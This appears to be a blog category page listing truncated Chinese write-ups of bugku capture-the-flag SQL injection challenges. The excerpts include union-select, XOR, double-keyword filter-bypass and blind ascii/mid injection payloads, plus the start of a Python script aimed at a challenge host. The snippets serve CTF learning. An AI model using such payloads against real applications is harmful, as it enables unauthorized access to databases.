SQL注入
偷一个月亮
爱搞事的web狗~
展开
-
bugku-INSERT INTO注入(附代码) 详细
# -*-coding:utf-8-*- # author : wen # flag:wen{b7bb30b3435f2e7c418b131f9e789f81} import requests import time url = 'http://123.206.87.240:8002/web15/' payload = 'abcdefghigklmnopqrstuvwxyzABCDEFGHI...原创 2019-06-19 21:32:36 · 680 阅读 · 0 评论 -
bugku-这是一个神奇的登陆框(附代码)(详细)
题目链接:http://123.206.87.240:9001/sql/ 数据库 表名 列名 select flag 代码 admin_name=admin" union select database(),database() #&admin_passwd=12345&submit=GO+GO+GO admin_name=admin" union select (s...原创 2019-06-20 12:29:05 · 910 阅读 · 0 评论 -
bugku-多次 (详细)
第一个考点:异或注入判断过滤关键字 ?id=1’^(length(‘union’)!=0)–+ 过滤的用双写绕过 GET /1ndex.php?id=-1' ununionion selselectect 2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=0x7765623130...原创 2019-06-20 14:55:19 · 1872 阅读 · 0 评论 -
bugku-sql注入2 (附详细代码)
构造select * from * where uname = $_POST[uname] uname=admin’-’ 此时uname=-1,不行 $sql = select * from users where username=$username; 在字符串username的值和数字0比较的时候,字符串变为了0 故此0=0 payload:admin’-(ascii(mid(R...原创 2019-06-20 22:14:42 · 1975 阅读 · 2 评论 -
php二次注入
原创 2019-07-03 20:09:45 · 281 阅读 · 0 评论 -
bugku login2
原创 2019-06-29 08:27:04 · 994 阅读 · 0 评论 -
bugku-实战2-注入
news存在注入点,4个字段 select tables 发现表太多了,显示不全 这时用字符截断函数 get flag原创 2019-06-29 08:31:39 · 338 阅读 · 0 评论
分享